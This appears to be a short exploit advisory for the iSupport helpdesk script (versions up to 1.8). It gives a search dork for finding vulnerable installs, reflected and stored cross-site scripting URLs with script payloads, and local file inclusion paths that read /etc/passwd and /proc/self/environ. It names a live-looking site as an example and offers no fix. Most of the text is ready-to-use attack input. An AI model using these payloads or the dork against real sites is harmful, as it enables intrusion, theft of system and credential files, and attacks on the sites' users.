---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------
Discovered by : Stink' & Essandre
DATE : 16/12/09
//////////////////////////////////////////////////////////////////////
Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $
//////////////////////////////////////////////////////////////////////
[+] Vulnerability and Exploitation
Dork : "Powered by [ iSupport 1.8 ]"
--[XSS]--
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]
Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
--[XSS]-- in the member zone
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)
--[LFI]--
http://[TARGET]/[PATH]/index.php?include_file=[LFI]
Exemple :
http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd
[+] Solution :
N/A
The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.